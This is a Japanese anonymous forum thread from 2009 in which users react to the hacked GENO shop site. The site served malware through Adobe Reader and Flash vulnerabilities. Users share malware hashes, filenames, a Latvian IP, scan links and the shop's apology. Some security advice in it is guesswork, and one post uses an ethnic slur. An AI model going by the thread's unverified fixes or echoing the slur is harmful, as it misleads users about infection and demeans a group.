バスター使ってないからわからんけど

このスレはアンサイクロペドフィリアに監視されています

バスターはやめとけ

むずかしい用語よくわかんない

JR等壊してきたシステムバスターは信用出来ない

conime.exeは4日以前もうちのPCのプロセス一覧にいたんだけど
こいつは感染の目安になるの？
それまでもAVGとVBオンラインスキャンで定期的にチェックしてたけど
検出されたウィルスはなかった。

>>249
誤検知の可能性もゼロじゃないけど感染していると見た方が良いかもしれないね。

てか、3/31の最終アクセスが正しいとするとまた妙な話だよね。

>>250
> adobeAcrobatとAdobe Flashに感染させて.exeを置くステルスタイプだから

それぞれのソフトに感染させるわけじゃないんじゃなかったような。
FlashはわからんけどReaderの脆弱性(9.1で修正済み)を利用してる。
そのときにUserAgentを見て挙動を変えてるっぽいと実験した人に
よるレスがあった

脆弱性はたぶんこれ
http://www.ipa.go.jp/security/ciadr/vul/20090311-adobe.html

>>261
お前ははやくCドライブをフォーマットする作業に入れよ

>>249
今携帯だから上手く貼れないが

トレンドマイクロが6日に同社セキュリティ対策製品へ提供したウイルス定義ファイルの一部で、誤検知の不具合が発生した。
同社では問題を解消した定義ファイルの提供を開始している。
6日午前中に提供が開始されたパターンファイル「5.945.00」において、「TROJ_GENOME.BK」を誤検知する問題が発生したもの。
インターネットでは、Q＆Aサイトやブログなどを中心に、検出に関する投稿が寄せられていた。
同社では同日夜に問題を解消した定義ファイル「5.947.00」の公開を開始しており、
「TROJ_GENOME.BK」を検出した場合は、アップデート後に再度検出状況を確認してほしいとアナウンスしている。

>>261
OSいれなおせ
という意味がわからないならPC投げ捨ててください
捨てたくないならせめてネットへつながないでください
LANケーブル抜けますか？わからないならコンセントぬいてください

とりあえずniftyのスキャンしたら見つかった。
AVGたんちゃんと仕事してくれよ・・・

conime.execonime.execonime.execonime.execonime.exe
conime.execonime.execonime.execonime.execonime.execonime.exe
conime.execonime.execonime.execonime.execonime.execonime.exe
conime.execonime.exe
conime.execonime.execonime.execonime.execonime.exe
conime.execonime.execonime.execonime.exe
conime.execonime.execonime.execonime.execonime.execonime.execonime.execonime.exe
conime.execonime.execonime.execonime.exe
conime.execonime.execonime.execonime.execonime.execonime.execonime.execonime.execonime.exe

conime.execonime.execonime.execonime.execonime.exe
conime.execonime.execonime.execonime.execonime.exe
conime.execonime.execonime.execonime.execonime.exe
conime.execonime.execonime.exe

>>265
どうも
俺は↓のを参考にして言ってみた
274 名前：以下、名無しにかわりましてVIPがお送りします[] 投稿日：2009/04/07(火) 16:19:00.03 ID:2LVvXzfi0 (PC)
PC通販ショップのサイトがクラックされて罠サイト化してるらしいね。
オープンプロクシにもなっていたっぽい。
短縮URLサービスを悪用して偽装したリンクをあちこちのスレに貼って
回ってるやつがいるから、2ch内で流行中。

JavaScript、Flash、PDFを経由してexeを仕込むようなので、
Flash Player、Adobe ReaderのバージョンチェックとFirefox+NoScriptなどの
防御が重要。
Flash Playerは10.0.22.87、Adobe Readerは9.1になっていないと危険。
Flash PlayerはIE用とそれ以外のブラウザ用の両方を確認する必要がある。
SecuniaのPersonal Software Inspector（PSI）で各種インストール済みソフトの
バージョンチェックもお勧め。


ソースは2chだから>>265の方が信憑性は高いか

>>267
5.949.00 での検出です　pupup.jsが残っていたと思うんだけど
これも感染してた？

感染してるのか分からないのが怖いな

感染した奴はいろいろ監視しつつ何か異変に気づいたら
逐一スレに報告するんだ

conime.exeがどうとか言ってるやつは2ちゃん見る前に勉強して来いよ

オンラインスキャンでわかるところってどこかある？
今ウィルスバスターの全件検索ちゅう。

こわいから他のところでもチェックしたい。

>>271
265もその元ネタも指摘してる部分は一緒だぞ
おまえの「感染させて」という言い回しがおかしいだけ

手っとり早いのはリカバリ

>>271
だいたいあってる
どこにもAcrobatとFlashに感染させるなんて書いてないよ

実際情報錯綜しててどれが正しいかなんてわからんとおもう
Genoがやられてるのは1種類じゃないかもしれないし
ああいうのは日々進化してるから実験場にされてるかもしれない

ただいえることは各種ソフトを最新にすることは
重要だよってことくらいじゃないかな

とりあえず、簡易検知（除去）ツールくれぇぇぇぇぇ。

>>276
どこでもいいけど同時にスキャンするのはおすすめしない

flash playerについて試してみた。IE6/2k。
やっぱりこのswfは flash player 9.0.115.0 以前に存在する脆弱性を利用したもの。
9.0.115.0でswfを読み込んでみたが、実行ファイルがダウンロードされコマンドプロンプトが立ち上がる。
9.0.124.0 以上であれば何も起こらず、攻撃は失敗するようだ。

>>276
73 名前：名無しの報告[sage] 投稿日：2009/04/06(月) 19:19:38 ID:75+y1xSFP (p2)
こんな具合か
Avast!:http://www.avast.com/jpn/download-avast-home.html
カスペルオンラインスキャン:http://www.kaspersky.co.jp/virusscanner
ノートンオンラインスキャン:http://www.symantec.com/region/jp/securitycheck/
ウィルスバスターオンラインスキャン:http://www.trendflexsecurity.jp/security_solutions/housecall_free_scan.php
マカフィーオンラインスキャン:http://home.mcafee.com/Downloads/FreeScan.aspx
Avastオンラインスキャン（ファイル単位）:http://onlinescan.avast.com/

IEの履歴に　94.247.2.195がなければ大丈夫？

>>283
ありがとう、　かたっぱしからやってきます。

トップページで仮の対処法ぐらい書いとくのが常識のある店
バカＧＥＮＯは非常識だからメンテ中でシラを切るトンデモ会社ｗ

やばい、俺も感染してるかもしれん
4月1日から仕事がない

とりあえずカスペオンラインでCドライブのスキャン完了。
専ブラのログに張られたウィルスコードと大昔に入れて忘れてた洒落のexeが引っかかった。
今回の一件は大丈夫だったってことだろうか。。。
すでに疑心暗鬼状態なので何を信じていいのかわからない状態ｗ

Flashは最新でReaderは１個前だったんだが。だいじょーぶかなあ？
あとFirefoxで履歴にGeno踏んでるのはわかったんだがいつ踏んだかわかるっけ？
ここ１~２週間ＰＣパーツ探しでいろいろなとこ踏んだからタイミングよく踏んだ可能性があるわ。ぐぐってた最初のほうで踏んでたならいいけど。

>>282
情報サンクス
やはりPDFだけじゃなかったか

>>282
あれ？初期とかわってね？
初期はPDFだったような・・・
ちょっとログあさってくる

>>272
バスターの検出だけでは何とも言えない。実際誤検出していたみたいだし
とりあえずしばらくは様子見するか、カスペ等のオンラインスキャンをするか
やはり気持ち悪いと思うならクリーンインスコするとか

>>277
>>279
すまん。俺の言い方が悪かったようだ

クアドコアだとCPUの負荷が高くても気付きにくいので最強

>>278
うんうん。

急がば回れだね。

無い頭をフル回転して無駄に時間が過ぎる位なら
とっとと手間を惜しまずにリカバリしたりクリーンインストールするのが安心確実。

ごめん
フラッシュも最初からいってました。てへっ。

>>291
news/?id=2　がPDFで
news/?id=3　がswf
ダブルで攻撃だよ

で　感染してると、どうなるの？
知らないexeがたちあがるん？

>>289
履歴とブックマーク管理で
表示→表示する→最後に表示した日時

で解ると思う

>>297
ｔｈｘ
ごめんね＞＜

>>298
最終的に会社クビになるよ

GENO,お前だけは許さない

geno界は恐ろしいところじゃのう・・

>>299
サンクス。先月の２２日だったわ・・・・。あぶねーｗ

まだ治まってないのか

>>302
Genoは名曲だぜ
http://www.youtube.com/watch?v=roY1HnIrSMc

>>306
そ、そうか

>>297
news/?id=10か10?か100でhogehoge.exe
斧のLa.exe、まだ残ってやがるｗ

>>308
いろんなとこにばらまいてるやつがいる。vipにも飛び火してる

>>286
そのトップを見に来て、感染拡大ww

.exeは↓の二種類だけ？
他にもある？

ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a
ttp://www.virustotal.com/analisis/d68ead408e6f44899668dfc4347df0db

もうダメだな、田代砲よーい！

>>297
news/?id=2に飛んでPDF起動しながったんだけどこれはなんなの？

>>311
ランダムに生成されるから数は増えるかも知れんけど中身は同じだと思う。

>>312
そういうノリはVIPでやれ

AdobeReadeの8.1.4なら問題ないんだよね？

最新Verは9.1じゃないの

>>313
初回アクセスがVistaならPDF返してこないよ
初回アクセスがXPならそのあとにVistaでアクセスしてもPDF返してくる

再起動したけど何の問題もなし

アウチ　>>316

>>315
はい、ｼｮﾎﾞﾝ。λ....

短縮ＵＲＬってどんなの？

>>314
ファイルサイズもハッシュも違うんだが・・・改良してないか？

価格.comのときはどうだったの？

さっきからどのブラウザもすげー重くなって、殆んどのサイトが開かない状態なんだが、
短縮系のURLか何か踏んじゃったのかな
これ感染してクソ重くなる事ってある？
今はカスペの完全スキャン中、今日電車でばーさんに席譲ったから感染してないでくれ

genoｱｳﾄﾚｯﾄはエラーが修正されたみたい。

こんな時くらい、すべてのページでお詫びを載せるのが常識だろうに。

>>325

>>325
メモリとういかページングファイルがおかしなことになってないか

>>196
Pwn2Own 2009とはまた別の大会？

>>326
残念だが、昨日もエラーはすぐ修正されてた。
と思ったらまた書き換えられると言うイタチごっこだった。
また書き換えられる可能性が高い。見ないことに越したことはない。

genoは直ったのか？

いまごろは
　「うちも被害者なんです＞＜」（ウチに来る客なんてバカだからコレで解決だろ(・∀・)ﾆﾔﾆﾔ）
って思ってるんだろうなｗ

>>323
もう一回?id=10踏んだら今度は"f9.exe"で、VirusTotalに献上しようと
落としたらZoneAlarmが「Trojan.Win32.Agent.caajだぞ」反応しおった・・・

>>320
8.1.4はAdobe Reader 9.1より新しい日付でアップデートが公開されてるんだけど。
それでもだめなんでしょうか。

>>334
　　 　　 ＿__　　　　━┓
　　　 ／　―＼ 　　┏┛
　　／ノ　　(●)＼　 ・
.　｜　(●) 　 ⌒）＼
.　｜　　 （__ノ￣　　|
　　＼　　　　　　　 /
　　　 ＼　　　　 _ノ
　　　　/´　　 　 ｀＼
　　 　 |　　　　　　　|
　　 　 |　　　　　　　|

　　　　　　　　　　 ＿＿＿　　　━┓
　　　　　　　　　／　―　　＼　 ┏┛
　　　　　　 　／　　(●)　 ＼ヽ ・
　　　　 　　/　　 （⌒　　(●) /
　　　 　　 /　　 　 ￣ヽ__） ／
.　　　　／´　　　　　_＿_／
　　　　|　　　　　 　 ＼
　　　　|　　　　　　　　|

しかしWeb管理してる会社はどこよ？
酷すぎる。この様な事態に陥ったらSorryサーバ代替で立てて、
元のサーバはケーブルひっこぬくのが常識だろ。

>>335
ttp://www.adobe.com/jp/support/security/bulletins/apsb09-04.html

>>334
大丈夫だよ。Ver.8、Ver.9それぞれで脆弱性対応版が出ている。
8.1.4は対応版。

ま、俺も偉そうにレスするようなご身分じゃないんだが・・・
昨日クリーンインストールしてさっきやっと全部のパッチかけ終わったｗ

俺完全に感染してるけどトレンドマイクロのオンラインスキャンでまったく検知できない
OS再インストールしたりパーティションいじくったりフォーマットしたりしても
まだ残ったまんまなんだが　orz
ちなみに感染したパソコンは３週間前にGENOでかったやつｗ
フロッピーとか手元にないし明日HDDの安いやつでも祖父で買う
GENOどうしてくれるの？

＞Adobe Reader 9.1へのアップグレードを望まないAdobe Readerユーザの方に対しては、
＞Adobe Reader 8.1.4アップデートおよびAdobe Reader 7.1.1アップデートを用意しています。

って書いてあるからどっちでもいいってことか

>>334
8.1.4はUNIX版のことじゃね？

>>263「conime.exe が・・・」

コマンドラインで操作した憶えがないのなら、ネット上のボットからトロイが
感染したした疑いがあります。感染対策をしていない貴方の振る舞いはボット
そのものです。GENOと大差ありません。

レジストリを以下のように変更することで、 conime.exe を無効にできます。
コマンドプロンプトで日本語入力することは、まず無いから。

「HKEY_CURRENT_USER\Console\LoadConIme」の値を「0」に変更 (デフォルトは「1」)

最低限できる対策。

Flashも同様にVer9でも最新ならおｋかな？

>>339
OS再インストールでって

>>333
てことはLa.exeと同じものか。
8lv.exeは旧バージョンのウイルスなのか？

>>339
全パーティションフォーマットしたのかい

>>336
何回か見たレスだけど何で同じことしか言わんのよ

今うっかりjava切らない形で楽天踏んだけど楽天で駄目なのはパソコン関連のところだけだよな？

>>345
このexeを保存する時にファイル名をランダムで生成して保存するんで、
ファイルの中身は同じだけど、踏んだ奴の数だけファイル名が存在するって事。

>>347　ＧＥＮＯのウンコ社員でしょ、責任回避の定例カキコｗ

>>336
sorry鯖立てなくても、ケーブル引っこ抜いておけば、
「あれ、geno落ちてない？」「落ちてるね」って会話で終わったと思う。
で、穴塞いで復活して目玉商品の一つも出せば「復活ｷﾀ--」で、メデタシだたのに。

今は、恥の上塗りが過ぎて、例えようの無い状態になってる。

>>338
やはり大丈夫なんですよね。
ググってたらこんな情報もありました。

バージョン7と8でも対処：Adobe、AcrobatとAdobe Readerの修正版を追加公開 - ITmedia News
ttp://www.itmedia.co.jp/news/articles/0903/19/news028.html

>>347
え？俺、この内容でのカキ子はしてないよ・・・

>>350
geno社員が鯖管してる可能性も大。

>>342
conimeを起動できなくすることで何の防御効果があるっての？

AVASTの更新きた

残しといたLa.exeも一瞬でZAに削除された。
昨日から報告が増えて処理対象に昇格したんかね？

自社鯖じゃない筈だけど

IT SOLUTIONは、システム開発までっぽい。

あとはロリポだとか、自分でレン鯖借りて設置してる。
みんなそれぞれのレン鯖使ってるね。

GENOの今日の特価品が気になる！

GENOってもうメンテ終わったの?

誰かGENOの今日の特価品スクリーンショット貼っておくれ

なんだメンテ中なのか

>>359
GENOウイルスが大特価0円！！

メンテなんて　やメンテ　　なんちゃって

jquery.jsっていくつかみつかったんだけど
ウィルスに感染してるやつはどう判別すればいい？

>>349
ファイル名がランダム生成というのは理解しているが
最初に報告されたものと最近のexeとはファイルサイズとハッシュが違う。
だから、改良されたウイルスが出てくる可能性があるのでは？

>>355
ﾄﾝｸｽ

俺のavastは自動更新が効かなくなり、本体からの更新もできないので、
サイトまで行ってダウンロードして手動で更新してる。
WindowsUpdateやるとIEがフリーズしたまま、何も起こらない。
マジ、俺のマシンやばいね。

店名がジェノサイドのジェノだし　わざとやったんだろ

>>354
ボット起動阻止

今日のAviraやる気出し過ぎ
V7.01.03.26

ゲノって読むんやろ？

>>364
　　　【審議中】
　　　　　　　　_,,..,,,,_ 　 _,,..,,,,_
　　　　 _,,..,,,_/ ・ω・ヽ/・ω・ ヽ,..,,,,_
　　　 ./　・ω_,,..,,,,_　 l　_,,..,,,,_/ω・ ヽ
　　　｜　　 / 　　・ヽ /・ 　　ヽ　　　 l
　　　 `'ｰ--l　　 　　 ll　　 　　 l---‐´
　　　　　　　`'ｰ---‐´`'ｰ---‐´

結局のとこｳｲﾙｽが怖くて今もGENOのHP踏めないﾁｷﾝばっかし
ﾁｷﾝじゃねーよってやつは今行ったっていう証拠出せ！！


もちろん俺はﾁｷﾝだが(´･ω･`)

＞株式会社GENO（ジェノ）は常にお客様の立場で考え、

http://whois.nic.ad.jp/cgi-bin/whois_gw?key=122.212.38.0/24

Network Information: [ネットワーク情報]
（長いので省略）

上位情報
----------
株式会社UCOM (UCOM Corp.)
[割り振り] 122.208.0.0/12

下位情報
----------
株式会社　ウェブドゥジャパン (Web Do Japan Co.,Ltd.)
CROOZ-SRVS [割り当て] 122.212.38.0/25
ワイデンアンドケネディジャパン・エル・エル・シー (WIDEN and KENNEDY JAPAN L.L.C.)
WKJPN [割り当て] 122.212.38.128/28
株式会社　フェアーウェイ (FairWay Co.,Ltd.)
FAIRWAYNET05 [割り当て] 122.212.38.144/28
有限会社　スタジオコンクエスト (STUDIO CONQUEST)
TK0009600106 [割り当て] 122.212.38.160/28
broadgate (broadgate)
TK0038500107 [割り当て] 122.212.38.176/28

GENOのホスティングやってるのUSENらしいわ。broadgateか。

TOPはずっとメンテ中の表示でしょ
ただ直リンで以下のどのページも見れるという・・・？

前やってたネトゲでゲノって呼ぶと怒るキチガイ思い出した

>>375
エロくないので詳しい仕組みは分からんけどこういうことらしい
http://www.robtex.com/dns/geno-web.jp.html#a1

GENOって最近躍進してる会社だよね？
こんな不祥事起こして残念だな。

いまフラッシュから落とされたexe(wJQs.exe)が今までと違ってた。
Aviraはスルー
MD5: 39509969d4b8bbe9ccb3d5e47f262e87

不正命令とかエラーになって実行できなかった。SP3だからかな。

avast更新来たけど斧に上げてくれたLa.exeには反応しないな

>>380
謎の文字列に見えた

>>381
avast対応遅すぎる

USEN（朝鮮企業確定）もGENO（出自不明）もお互い譲らず金の亡者だということ

genoのipどれ？

で、この事件はいつ終息するん？

>>380
すまんバイナリ覗いたら中身は例のクッキーだった

世界のジェノサイド の歴史に新たな１ページを書き加えたGENOだった

単刀直入に
どうなってたら感染してるって言える？

GENOへのリンクを未だ消してないブログやアフィサイトが多いな

>>388
Ｘ６８０００用のジェノサイドでもやるか・・・

>>391
あのゲームはかっこよかったな･･･
音楽が特に･･･

チェックかけて反応が出たら。

>>389
ラトビアにアクセスしてるかしようとしてたら

つーか、前までジェノサイド無料で後悔してたが消えたな
x68000 biosも無料で後悔されてるから、実記無でもできたのに

IE立ち上げたらラトビアと交信

>>386
GENOのサイトはこれからも書き換えられるから問題は全く収束しない。
しかも、セキュティーホールがadobeだから、WindowsUpdateとかで
全て網羅的に対応するってこともできない。本人が意識して行動しないと
いけない。普通の人にそれムリだから。ウイルスに感染したことも
理解してないと思う。気の毒。

firefoxでAcrobatReaderが8.1.2でFlashPlayerのバージョンは不明な
環境です。
ルータのログから１度はラトビアには行ったようなんだけど、
青画面もないし、レジストリのauxも大丈夫みたいなんで、
感染していないかなって思ってるんだけど、
大丈夫なこともあるのかな？

いまのところ念のためLAN抜いた状態なんだけど、
FlashPlayerのバージョン調べる方法はある？

>>361
http://up2.viploader.net/pic/src/viploader970234.jpg

La.exeを覗いたらアンチウイルスソフトの名前らしきものがあった。
NODとかAVGとか
ttp://www.dotup.org/uploda/www.dotup.org28952.png.html

>>398
Adobe Flash Player のバージョンテスト
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

>>398
Adobeにバージョン確認用ページがある

>>398
ここ踏めばインストールされてるFlash Playerのバージョンが表示される
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

GENOはなかったことにするつもりなのか？

おいおいまだ解決してないのかよ！

ラトビアに行ってるのに今さらバージョン調べて何になるの？

>>399
ぷっ！ｗｗｗ

ラトビアに連れて行ってもらえるのですか？いいですね

今USENとGENOはお互いに意地の張り合いみたいなことしてるけど、

今のような対応が続けば間違いなく致命的なダメージを受ける側は、
GENOに決まってるわな、そこのところ分かってるのかなあ？

つーか、金の亡者の産廃業者に人倫的な対応求めること自体無理か

>>399
右下って・・・
まだ感染中なのか・・・？

ttp://www.vipper.org/

vipper.org 跡地
このサイトは、運営者の都合により閉鎖されました。
約4年もの間、ご利用ありがとうございました。


え？

ttp://www.uploda.org/

うｐろだ.org 跡地
このサイトは、運営者の都合により閉鎖されました。
1760日(4.819年)もの間、ご利用ありがとうございました。

需要があるか分かりませんが、時間を捻出できれば、
アップローダで補助的に使用していた小物スクリプトを公開したいと思っております。

メールアドレス
[email protected]

2004/06/12 - 2009/04/07

>>399
ノートン先生って ”安全” って言い切るのか、すごい自信だな。

vipper.orgが閉鎖
http://tsushima.2ch.net/test/read.cgi/news/1239109631/

【ヤフー＋USEN】 yahoo、5億円でGyaoを子会社化 Yahoo動画とGyaoが統合へ
http://tsushima.2ch.net/test/read.cgi/news/1239092673/

USENやばいな

GENOの「今日の特価品（だっけ？）」はすごい安いから毎日楽しみにしてる

>>404
明らかにな。

>>414
サムネイルみてニヤニヤする日課がーー

>>398
コンパネのプログラムの追加と削除から
サポート情報を参照するには、ここをクリックしてください　のとこ

無かったことにするだろうな。　今まで通り客が来てくれれば謝る必要なんてない。
２ちゃんごときで騒がれても痛くもかゆくもないだろう。

芸能人ブログの痛発言とかも大概なかったことにするよNE

spybotってなにしてるんすかね

とは言え、こんな何が仕掛けられているのか分からない、
これからも色々な罠が仕掛けられる可能性が高く、またそれを防ごうともせず、
さらには利用すると悪用する気満々の奴に個人情報を抜かれる店で
買い物をしたがる変態なんているのか？

>>422
ぼーとっしてるよ

>>401-403

＞いまのところ念のためLAN抜いた状態なんだけど、
＞FlashPlayerのバージョン調べる方法はある？

こいつらバカだろ

>>418
ローカルで確認したいんで助かります。

>>406
よくわからんけど、geno踏んだらとりあえずは
ラトビアに行くんじゃないのかな。
そのあと感染するかは環境次第かなって思ってる。

ここまで放置されるのが不思議でならない

>>422
君のPCでスパイ活動してるよ

avast対応してねえの？

>>425
まずフラッシュプレイヤーが何か判ってないに１００ﾍﾟｿ

javascriptでとばされるんじゃないの？

メンテおわったな。お詫びがでてる

復活した
ttp://www.geno-web.jp/

隠すようにお詫びが出てるｗｗｗ

>>433
復活はいいんだけど直ってんの？

このウイルス、ただラトビアにトラフィックを飛ばしてるだけで実は無害なんじゃね？

と思えてくる今日この頃

お客様へ
4月4日、4月7日に当社のwebサイトに外部より不正アクセスが有り、一部のプログラムに不具合が生じ、当社のHP以外のページへリンクされる状態が発生しました。ご迷惑をおかけし申し訳ございません。
現在は外部からのアクセスができないように対処いたしました。
現在すべてのプログラムは正常となっております。
すべてのプログラムチェックの為、復旧に時間がかかりましたことを重ねてお詫び申し上げます。

又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。
・インターネットエクスプローラー6をご利用のお客様
・インターネットエクスプローラー7をご利用のお客様
・Firefoxをご利用のお客様

尚、サーバーのウィルス感染や個人情報の流失はございません。

今後はセキュリティーの強化を更に徹底いたします。
このたびは多大なるご迷惑をおかけし申し訳ございませでした。
今後ともよりいっそうのお買い得商品の提供に邁進する所存でございます。
GENOwebを引き続きよろしくお願い申し上げます。

2009年4月7日
web通販ショップ GENO

>尚、サーバーのウィルス感染や個人情報の流失はございません

工エｴェｪ（´д｀）ｪェｴエ工

>>437
USOだッ！

>>433
怖くて踏めないよ

なん・・・だと？

bitdefenderは対応した＿？

使ってないｾﾚ800マシンに3回目のXPクリンインスト
3度目genoに突撃してきます
もちろんノーガードだ
もう中毒になってるわw

なんだ、キャッシュクリアするだけでいいのか

寝ようとした時良いタイミングでメンテ終わりやがった

※経費削減のため弊社のセキュリティソフトはソースネクストのウイルスセキュリティZEROを使用しています

キャッシュクリアだけでは直らないだろｗ

恐くて踏めないけど、今日の特化知りたい奴

【4/7 21:00】限定40枚 DDR PC3200(400MHz) 512MB メジャーチップ (184pin) 良品中古 デスク用
　 　
[商品番号] GA06517680
[販売価格] 799 円
[ポイント] 1
[在庫数] 40
　 　
お一人の注文数に限りがあります。最大注文数[2]

だ、まあ他の商品も更新してあるし、見たほうが微妙

　　　　　　　 /　 /　/　　　 | 　　　/| 　　/:::/:.:.:.:.:.:.:|::::::　　
　　　　　 　/　 〃　i 　 　 .::|　　 /:.:.|　　|::l::|:.:.:.:.:.:.:.:|::::::
　　　　　　,ﾞ　 /| 　 |　　　.:::|. ＼|:.:.:.:| 　 |::l::|/:.:.:.:.:.:ｊ／::　
　　　　　　!　,'　!　 ::|　 　 ::::|!. ,ｨ|≧ゝl､_.;|::ｨ|/_:._／ｨllヘ　　　　　　
　　　　　　ｌ ,'　│　::|:..　　::::|く/ {ひlll|::|ヾ|:.N:.::´〃ひlllﾘ::　　・・・・・・・・！！
　　　　　　ヾ　　'､　 |＼　 ::::|:.＼＼こｿ:.:.:.:.:.:.:.:.:.:､､＼こｿ　　
　　　　　　　 　 　'､ :|　 ＼ :::＼:.:._,､__彡　_'　-─ ､`ﾞー=　　　　
　　　　　　　　　　　ヾ､／.::＞:､:;ヽ､__　 /ｰｧ''"´￣ ヽ　　　　　　
　　　　　　　　　　　／ .::::::::::::::::ﾍ￣ 　 {|::/ 　 　 　　}　　
　　　 　 　 　 　 ／...::::::::::::::::::::::::::＼　　V　　　　　　ｊ}　

>>437
ウイルス感染なしだと・・・?

お詫び文が見つけられないｗｗｗ

ひょっとしてまだ垂れ流しなのか
Opera最強伝説の俺には無関係だが
フラッシュは最新にしてるし

’†?A?p?\?R?“?A?p?\?R?“?p?[?c?I’E”I?V?‡?b?v?f?d?m?n

>>451
TOPの上の方にヒッソリと隠れてますｗ

復旧してもここでは絶対買わないわｗ

OperaやSafariは平気なのかｗ

お客様へ

4月4日、4月7日に当社のwebサイトに外部より不正アクセスが有り、一部のプログラムに不具合が生じ、当社のHP以外のページへリンクされる状態が発生しました。ご迷惑をおかけし申し訳ございません。
現在は外部からのアクセスができないように対処いたしました。
現在すべてのプログラムは正常となっております。
すべてのプログラムチェックの為、復旧に時間がかかりましたことを重ねてお詫び申し上げます。

又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。
・インターネットエクスプローラー6をご利用のお客様
・インターネットエクスプローラー7をご利用のお客様
・Firefoxをご利用のお客様

尚、サーバーのウィルス感染や個人情報の流失はございません。

今後はセキュリティーの強化を更に徹底いたします。
このたびは多大なるご迷惑をおかけし申し訳ございませでした。
今後ともよりいっそうのお買い得商品の提供に邁進する所存でございます。
GENOwebを引き続きよろしくお願い申し上げます。

2009年4月7日
web通販ショップ GENO

＞又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。

どういう意味だよｗ

もう大丈夫なのか？本当か？

>又、旧プログラムを消去するためお客様側の対処といたしましては
webブラウザのキャッシュのリセット頂く事をお願い致します。

要約すると無かった事にしたいので証拠は消して下さい。

え、祭りですか？

キャッシュクリアしただけで回復するわけないだろｗｗ

スレ読んでる間に対応ってレスがついてたわ…

>>456
OperaはPDFがあってもデフォで開くかどうかを聞いてくるからな

>>437
確かにサーバーはハックされたけど感染してないわなｗ

また祭ですかー？

結局どれが対応してるんだ

＞尚、サーバーのウィルス感染や個人情報の流失はございません

よかった、ウイルスはなかったんだ。

頭大丈夫かよ…どうなってんのマジで

＞又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。

どうしてもウイルスという言葉は使いたくないみたいだなｗ

これはひどい

核燃料投下だなｗ

全力でいくか？

ウリナラフィルター並に強力な俺様解釈だなｗ

いちおうSS
http://www1.axfc.net/uploader/He/link.pl?dr=93804049&file=He_214169.jpg

genoｵﾜﾃﾙ＼(^o^)／

やった！　前スレの7に予想したのがほぼ当たっててちょっと嬉しい！

http://www.geno.co.jp/4D/webshop/IE.jpg
http://www.geno.co.jp/4D/webshop/IE7.jpg
http://www.geno.co.jp/4D/webshop/firefox.jpg

キャッシュのクリアの仕方も解説

Ｇ　Ｅ　Ｎ　Ｏ　は　ネ申　！　！

GENOが俺の中でザコンレベルのショップになり下がった瞬間だった

終わったのか

でもまあ問題は解決したんだからこれにて一件落着

･･･した、のか？？？？？

まれに見るクソサイト

ということはアンチウイルスソフトの誤作動ってこと？

これはアンチウイルスソフト会社に損害賠償請求すべき。

＞尚、サーバーのウィルス感染や個人情報の流失はございません。

ウイルスではないと？
実際、感染するとラトビアにパケット飛ばすんだろ？

これは・・・まじに許せんわ

パートスレなんか立てちゃって・・・
お前ら釣られてんじゃねーぞ

全力だろこれは

これは酷い('A`)

>尚、サーバーのウィルス感染や個人情報の流失はございません。

ハッキングされたのに？

>>437
言葉の意味はよく分からんがとにかく凄い自信だ

この謝罪文の内容を本気で書いてるとしたら

施した対策は
サーバーに潜んでるウイルス本体を見つけれないから
単純にラトビアを禁止リストに入れただけだろうな

飛ばされないだけでサーバー内部の書き換えは現在進行形で行われてるかもｗｗｗ

>>483
ラトビアへのリンクがあって
そこにウイルスがあったのではないのか？

これで明日また改ざんされてたらさらに燃料投下。
特価といいいつも期待させてくれるぜ。

謝る気さらさらないｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ　感染した奴哀れｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>472
だな〜〜
こりゃだめだ。。。。。
彼の国じゃ焼き討ちにされても文句言えないぞ

ショッピングサイトとしてはもう致命的なんだがな

>>477
これで死にかけたＰＣが本当に治ったりしてなｗ
だったら許すわ

俺なんて1日かけてリカバリしたのに・・・

>>437
　　　　 　 　 　 ＿＿＿_
　　　　　　　:／ﾉし　　　＼::　　　　　　　　　＿＿_
　　　　　 :／　⌒　　　u;　 ＼::　　　　　　／―　　＼
　　　　:／ 　 、 　　　　　　　 ＼:　　　 ／ (●)　 ＼ ヽ
　　　　:|　　　＾　　　　　　　　　 |:　　／（⌒　　 (●)　|
　　　　 ＼　;j　　　　　　　　　／: 　 |　　￣ヽ__）　　　|
　　　　/⌒　ﾟ　　　　　　　　(´ 　 　 ヽ　　　　　　　 ／
　　　 /　　ﾟ　　　〜､　　　　,⌒＼　　ni777　　　 ／
　　　/　j(,　　　　　r　 　　　、ﾟ　 ＼ /　.ﾉ　　　 `＼
　　 /　　　　　　　　　　　　　ゝ　　 jヽ /　　　　 i 　|
　　/　:j　　　　 ﾟ　　　　　　　|　＼　　/　 　　 　.i　 |　　　　　　　　
　　|　　　　　　　　　　　　　　|: 　 ＼/|　　　　　 | 　|　　　　　　
　　|　　ﾟ　　　　　　　 　 :j　　|:　　 　　|　　　 　 u＿)

いますぐ忘れろっってことか！

>又、旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。

旧プログラムって何だ？

>>437
確かこの騒動のはじめ頃に4月3日くらいにGENO覗いたらブラウザ落ちてラトビアに連れてかれたって書き込みがあったような？

もし見てるんならウイルス製作者を盛大に応援するよ。俺は。
こんなアホな対応あるか！！！

>>483
サーバーがウイルスに感染してないだけで
サーバー上にあるWebページにアクセスした俺らのPCにウイルスをばら撒いていないとは一言も言ってないｗ

>>500
もしや、GENO自体にプログラムが仕掛けられていたのでは？！

>>500
ウィルス

>>437
ウイルス仕込んだ人を応援したくなる流れだなｗ

俺再インストールまでしてだめなんですけどｗ

>>491
一回はリンクを削除したのに復活したって事は
ラトビアへのリンクを作ってたウイルス本体が有るはず

流石にもうそろそろ全面降伏でごめんなさいしたろと思って来てみたら糞対応でワロタ。
駄目だろこれ。

>>508
なるほど。

頭の中のメモリキャッシュもクリアしろだとッ！？

数秒後……
　　　　

　　　　　さぁって今日もGENOで特価やってるかなぁ♪るんるん

>500

ＪＳファイル

こーなったらUNIX板の方々にお出で頂いて
Geno鯖の穴探しをしてもらうしかない感じだな。

